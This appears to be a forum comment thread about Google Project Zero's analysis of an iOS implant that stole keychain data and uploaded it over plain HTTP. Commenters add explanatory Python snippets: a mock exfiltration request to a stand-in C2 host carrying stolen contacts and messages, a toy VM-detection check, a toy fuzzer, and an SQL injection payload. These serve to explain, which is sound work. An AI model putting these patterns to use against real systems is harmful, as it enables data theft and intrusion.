The downside of Android being an open platform is that Google is limited in forcing vendors to update their devices - and most do not. That said, Android has had regular monthly security releases for years, and the Pixel devices are excellent from a security perspective. Google also monitors its app store - as well as the full Android ecosystem (as long as Google Play Services is installed) for potentially harmful applications. This is why you regularly see articles along the lines of "Google removes malware from the Play Store that has had X installs!"

I'd say the biggest vulnerability for Android users given its impressive scale is a vulnerability in a vendor's supply chain. Given the complexity of devices, a vendor likely has multiple places where a malicious actor could insert malware into an Android device. I think this is why US intel has ultimately decided devices from China - Huawei in particular - are untrustworthy. If you can't validate every component of a device and trust the vendor will always audit its security, then it's hard to trust a device, even if it is safe right now.


I suspect the main issue is that regardless of what Google does, manufacturers still need to make any new updates available, which most do not for anything but their most recent models.


The compatibility definition document for Android gets it pretty secure, but realistically the only secure Android devices are Pixels in my opinion.


This is terrifying... most people do not hard reset their phones ever (even when upgrading). What are the odds that these payloads are floating around despite the exploits being patched?


From the article, a reboot will do it. You don't need a hard reset:

"The implant binary does not persist on the device; if the phone is rebooted then the implant will not run until the device is re-exploited when the user visits a compromised site again. "


The implant is gone, but the attacker still has keychain data and can/did/does use it to continue downloading data in clear text:

“The implant uploads the device's keychain, which contains a huge number of credentials and certificates used on and by the device. ... The keychain also contains the long-lived tokens used by services such as Google's iOS Single-Sign-On to enable Google apps to access the user's account. These will be uploaded to the attackers and can then be used to maintain access to the user's Google account, even once the implant is no longer running. ... There's something thus far which is conspicuous only by its absence: is any of this encrypted? The short answer is no: they really do POST everything via HTTP (not HTTPS) and there is no asymmetric (or even symmetric) encryption applied to the data which is uploaded. Everything is in the clear.”

(Source: https://googleprojectzero.blogspot.com/2019/08/implant-teard...)


Even worse is this part:

“they really do POST everything via HTTP (not HTTPS) and there is no asymmetric (or even symmetric) encryption applied to the data which is uploaded. Everything is in the clear. If you're connected to an unencrypted WiFi network this information is being broadcast to everyone around you, to your network operator and any intermediate network hops to the command and control server.”

So not only are your photos, contacts, and messages stolen, but they are then sent to the attacker over HTTP, so the data is probably logged on every router, modem, and Wi-Fi sniffer along the way.
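To illustrate just how exposed plain HTTP is, here's a sketch of what an exfiltration request looks like as raw bytes on the wire (the endpoint, host, and field names below are invented for illustration, not taken from the actual implant):

```python
import json

# Hypothetical stolen data, serialized the way the implant is described
# as doing: JSON in an unencrypted HTTP POST body.
stolen = {"contacts": ["alice", "bob"], "messages": ["meet at 5"]}
body = json.dumps(stolen).encode()

request = (
    b"POST /upload HTTP/1.1\r\n"
    b"Host: c2.example.com\r\n"
    b"Content-Type: application/json\r\n"
    b"Content-Length: " + str(len(body)).encode() + b"\r\n"
    b"\r\n" + body
)

# Any passive observer (open Wi-Fi, ISP, intermediate router) can read
# the stolen data directly out of a packet capture:
assert b"meet at 5" in request
```

With HTTPS, only the TLS handshake metadata would be visible; the body would be ciphertext to everyone except the C&C server.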


That's not the worst part. The worst part is the attacker getting the data. The slight chance that while you're infected you also happen to be on a public wifi in the same room at the same time as a random opportunistic hacker, or that an ISP employee is risking their job by combing through petabytes of transient customer data, is much less concerning.


The attacker gets the data either way, HTTP or HTTPS. But by uploading over HTTP, other sniffers of public traffic also get your data.


Maybe broadcasting the data is the goal in itself, and having it reach a centralised server is not the primary aim; imagine an operational theatre.


This makes sense if a state-level actor with global network visibility (including playback capabilities, aka XKEYSCORE and TEMPORA) is behind it.

Even if a C&C server is taken down, they would still be able to persist the data.


Surprising. Is it really that much more effort to make an HTTPS call instead?


I wonder what happens when Apple distribute the update and it detects this is on your phone. Do they even notify you?


IANAL, but shouldn’t this be a requirement under the GDPR? As a data controller, an organisation has the obligation to disclose any loss/leak of data, so this should be enforced.


I'm wondering about this too. The GDPR requires a public notification. Why the hell is this coming from flippin' Google?! Why don't we have numbers on how many users were affected? Why isn't there a way to see if you're the one affected?


There was no Apple data breach. User endpoints were attacked, using various well-crafted exploits against their software. This isn't a GDPR (privacy) issue; no company data was leaked, it's end-user data from their devices. Apple tries to protect your data on its devices, but all software has bugs. Bad guys will try to exploit these bugs to reach their goals.

Google does research into making it hard for attackers to compromise user devices; that is the purpose of the Project Zero team. There are no numbers because nobody has them except the attacker. I am guessing Google has some ballpark numbers based on search traffic or web analytics.

If you want to know if you were affected, you need to ask yourself whether a powerful adversary wants access to your data, possibly because of civil unrest occurring in their territory, and whether you visit strange websites related to this. Only the adversary knows for sure, not Apple, not Google.


The GDPR doesn’t care where the personal data is stored, I thought. It makes no distinction as far as I can tell between data stored on a web server and data stored on a device. You seem to be making a distinction. Is there a source you could reference?


I don’t know that the updates would detect this. And even if they did, I doubt Apple would say anything.


Well, according to the article they pushed the fix six months ago, so apparently not.


The update would restart your device and wipe the malware.


Do you think there's a bank of iPhones at Google loading every webpage on the internet and looking for unexpected background processes or network traffic?


Yes. Or some virtualized equivalent.


That's what the crawler infra can be used for. It can easily be adjusted for this purpose.


Either that or they have specialized web-crawlers that emulate various browsers.


Emulating a browser wouldn't be good enough for most exploits. Most stealthy malware immediately deactivates itself if it thinks it is on an emulated or virtualized system.


First, most malware is not that sophisticated. While some does VM detection, most (as is the case here) does not. Second, VM detection is an arms race; see for example the VMCloak project. Third, with the rise of BYOD and VDI, VM detection is less common in sophisticated malware, as the target is frequently virtualized. Fourth, VM detection is harder on ARM than on x86. Fifth, detecting VM-detection code via static analysis is very effective.
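For a sense of how crude most of these checks are, here's a toy version of naive VM detection (my own illustration, not taken from any real sample): scan /proc/cpuinfo-style text for well-known hypervisor markers. Real malware checks many more artifacts (MAC address prefixes, guest-additions drivers, timing), and tools like VMCloak exist precisely to scrub these markers from the guest.

```python
# Marker strings commonly associated with virtualized environments.
VM_MARKERS = ("hypervisor", "vmware", "virtualbox", "kvm", "qemu")

def looks_virtualized(cpuinfo_text: str) -> bool:
    # Case-insensitive substring scan over CPU feature/vendor text.
    text = cpuinfo_text.lower()
    return any(marker in text for marker in VM_MARKERS)

assert looks_virtualized("flags : fpu vme de pse hypervisor")
assert not looks_virtualized("flags : fpu vme de pse tsc msr")
```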


If I understood what little I read of the exploit details, it actually loads an opaque payload through WebGL calls, so simply crawling with an iPhone's user-agent wouldn't be enough to notice anything "fishy". The site can just serve the payload to all visitors, and then the implant gets installed if the resulting kernel calls can be exploited as described in the article.


It might be good enough to flag "interesting" websites for further research on native (or emulated native) environments


Maybe. The article seems to imply that this implant was given to all comers, which may explain how Google found it.


I think it’s more likely that Google researchers were sent these exploits or stumbled upon them through manual research.


It's staggering how systematically broken IOKit remains.


Technically these are bugs in IOKit drivers and not the IOKit framework itself: it’s a footgun and not an exploding gun.


True, but driver methods are exposed through the IOKit framework, which clearly does not even attempt to reduce the attack surface and instead makes exploitation easier. Thus, its design appears to be fundamentally broken.


It seems the WebKit renderer process goes into an infinite sleep when this exploit is used. Since iOS doesn't use a separate renderer for different web domains/iframes, that would mean the entire tab freezes.

Surely that would be a pretty big giveaway for the user - "I was just browsing round the bombmaking-for-dummies webpage, and my browser just froze, and I had to kill it and reopen it".


Safari on iOS is pretty much the most unstable browser I have used in the last ~5 years. I can't count how many times I had to kill and reopen Safari just because it froze on some YouTube video.

So, no this is not a big giveaway.

Unless something on the YouTube site targeted my own and most of my friends' iOS devices, of course.


Really? The only time I have it freeze is on early betas or when I visit a million-page-long PDF or something. I wonder if it is worse on devices with 1GB of RAM or if I’ve just gotten lucky.


I don't have an iOS device with less than 2GB of RAM. So I don't think memory is an issue.


Never happened to me.


What does this mean? Should I reset all my passwords just in case?

“Given the breadth of information stolen, the attackers may nevertheless be able to maintain persistent access to various accounts and services by using the stolen authentication tokens from the keychain, even after they lose access to the device.”


The attackers could have stolen your 2FA tokens (e.g. if you use Authy or Google Authenticator) - you need to reset those in addition to your passwords.


Tweet for defenders on how to spot the sites: https://twitter.com/craiu/status/1167358457344925696


Any way to check if my iPhone is affected? I'm still on 12.1.2, which was released before the fix, so if I'm affected, I should still have the malware on my device.

I'm not opposed to jailbreaking to check.


The implant binary does not persist on the device; if the phone is rebooted then the implant will not run until the device is re-exploited when the user visits a compromised site again. [1]

1. https://googleprojectzero.blogspot.com/2019/08/implant-teard...


Just important to note that restarting the device is not the end of it. "Given the breadth of information stolen, the attackers may nevertheless be able to maintain persistent access to various accounts and services by using the stolen authentication tokens from the keychain, even after they lose access to the device."

I would recommend checking your login history / OAuth permissions to anything you had in your keychain, changing passwords for anything critical you used on your device if you suspect you were infected, a restart won't undo stolen information.


If you have restarted your iPhone at any point, it will wipe the malware.


I literally don't understand how you get the knowledge to write an exploit like this. I'm a C++ programmer working on game engines, so manual memory management is my bread and butter, and you have to have a detailed understanding of the underlying hardware architecture to do this job, but I don't understand how you go from where I am to writing a low-level exploit like this.


Fuzzing using something like AFL, possibly?

http://lcamtuf.coredump.cx/afl/
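AFL itself is coverage-guided and instruments compiled targets, but the core loop is simple enough to sketch in a few lines: mutate a seed input, feed it to the parser, and collect inputs that crash it. The `parse_header` function and its length-field bug below are invented for illustration.

```python
import random

def parse_header(data: bytes) -> int:
    # Buggy parser: blindly trusts a length field in the input.
    if len(data) < 2:
        raise ValueError("too short")
    length = data[0]
    return data[1 + length]        # out-of-range 'length' crashes here

def fuzz(seed: bytes, rounds: int = 2000) -> list:
    crashes = []
    rng = random.Random(0)         # fixed seed for reproducibility
    for _ in range(rounds):
        mutated = bytearray(seed)
        mutated[rng.randrange(len(mutated))] = rng.randrange(256)
        try:
            parse_header(bytes(mutated))
        except IndexError:         # the interesting crash class
            crashes.append(bytes(mutated))
        except ValueError:
            pass                   # expected rejection, not a bug
    return crashes

crashing = fuzz(b"\x02ABCD")
assert crashing                    # the length-field bug is found quickly
```

Real fuzzers earn their keep by using coverage feedback to keep only "interesting" mutations, which is what lets them dig many layers into a parser instead of just scratching the surface.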


I must be missing some core concepts here. How is it possible to get arbitrary objective-c code running on your iOS device simply by visiting a web site? EDIT: found the discussion: https://googleprojectzero.blogspot.com/2019/08/jsc-exploits....


From about 2016-2018 I was wondering why my iMessages became fodder for strangers to parrot back to me at coffee shops in the small USA town in which I was living. Of course, I explored the idea that the other parties of these iMessage conversations (usually thousands of miles away with no apparent connection to people in my locale) had somehow betrayed me. This was likely not the case, as I confronted those parties and they adamantly denied discussing or sharing our conversations.

It’s likely that my devices were owned and on display for hackers in my local community. This article is a reminder of the trauma experienced as a result of the paranoia and mistrust I experienced, and a reminder that we are not to trust our consumer devices to really care about our privacy.

If Apple cared about user security they’d build robust defenses into the devices that give the end user a degree of confidence regarding security. Instead, the iPhone on which I’m typing could at this time be 100% owned and leaking data in real time, and I’m afforded no visual indication of that possibility. The camera and microphone could be hot and transmitting, and Apple refuses to offer any way to confirm this in a robust, hardware-visual, unhackable way. That computer camera activity LEDs can be hacked (or could be in previous iterations) is indicative of the level of irresponsibility going on.

The blob that is the combination of a modem that interacts with cell towers, and the vastly complex computer tied to it, affords zero insight into what the phone is doing or whether it is betraying me.

And such privacy breaches are enough to ruin lives. The world is full of malicious folks who enjoy hurting others if they can get away with it.


I’m sorry, what? Strangers at coffee shops in your small town would read your private iMessages to which they somehow had access? That makes literally 0 sense.

- How did they know your name / for whom to look up these hacked messages?

- How did they know where to find these hacked messages?

- Why would they reveal their ability to watch your every move by repeating your private messages?

- Even if they had all of these capabilities and no shame about letting you know, why on earth would they care enough to look at your messages?

The scenario you’re convinced happened sounds completely bizarre, and gives me some strong Terry Davis vibes (no disrespect to him - that’s the person he became due to his illness).


You sound like you might also be interested in the Librem 5 phone coming out this year.


So as an iPhone user, is it time to go into my password manager and generate new passwords for all my logins?


>The root causes I highlight here are not novel and are often overlooked: we'll see cases of code which seems to have never worked, code that likely skipped QA or likely had little testing or review before being shipped to users.

So similar to Stagefright?


> It’s difficult to understand how this error could be introduced into a core IPC library that shipped to end users. While errors are common in software development, a serious one like this should have quickly been found by a unit test, code review or even fuzzing. It’s especially unfortunate as this location would naturally be one of the first ones an attacker would look, as I detail below.

Wow, Google. Like, I applaud the Project Zero program and its goals, but you never write this sort of stuff when discussing your Android vulnerabilities. This is just petty.


Very informative writeup! I'm curious if there is a way to see which devices have been affected by these exploits.

After reading the disclosure policy, this vulnerability must have been fixed already. I'm guessing this has been fixed in iOS 12.4 or even before?


I'm always impressed by Google's Project Zero team, but I'm also impressed by the abilities of the implementer(s).

What's interesting is that (for most of these cases) I find that I can understand the process of the reverse engineering, but I am completely stupefied as to the process of the initial implementation. I understand finding relatively superficial vulnerabilities (e.g., an SQL injection attack [1]), but I don't understand how these vulnerabilities are found when they are so many layers deep.

If anyone has an insight I would really appreciate it.

1. https://xkcd.com/327/
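For contrast with the deep bugs in the writeup, the "superficial" class referenced above really is this simple. A minimal sketch using an in-memory sqlite3 database (table and data invented for illustration):

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, secret TEXT)")
db.execute("INSERT INTO users VALUES ('alice', 'hunter2')")

evil = "nobody' OR '1'='1"

# Vulnerable: attacker input is concatenated into the statement, so the
# quote in 'evil' rewrites the WHERE clause.
rows = db.execute(
    "SELECT secret FROM users WHERE name = '" + evil + "'").fetchall()
assert rows == [("hunter2",)]          # injection dumps the secret

# Safe: the driver binds the value, so the quote is just data.
rows = db.execute(
    "SELECT secret FROM users WHERE name = ?", (evil,)).fetchall()
assert rows == []
```

The iOS bugs in the post are the same failure mode (untrusted input crossing a trust boundary unchecked), just buried under many more layers of serialization and IPC.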


I mean that's the thing, they're layers deep but those layers can largely be approached individually, and swapped as needed.

You don't have to wait until you find a JS exploit to start work on a payload achieving further privilege escalation, you use existing development tools and privileges.

And conceptually, what's really so different between SQL injection and the lack of proper checks on the binary data header field at the beginning of the first post?

One of the later posts in the linked series goes through how the initial-stage code is, in one case, taken verbatim from the JS test case in the WebKit commit fixing the bug (with the fix only reaching users months later).

(Not at all saying it's not incredibly impressive or that I could do any of it, haha)


Do we have any idea at all about how many users were affected?


Ugh. Blogspot does not render well on mobile for me.


Time for widespread adoption of mobile EDR.


Would the extra attack surface from third-party apps looking at sensitive system data outweigh the benefits of an EDR solution?

Poking a hole in the sandbox for "security" or "auditing" seems a bit risky.


Mobile EDR is not going to help consumers, especially not when the attacker has a kernel write primitive.


How exactly were these websites able to install this malicious code?


The P0 guys have a whole article about that: https://googleprojectzero.blogspot.com/2019/08/jsc-exploits....


They exploited bugs in Safari.



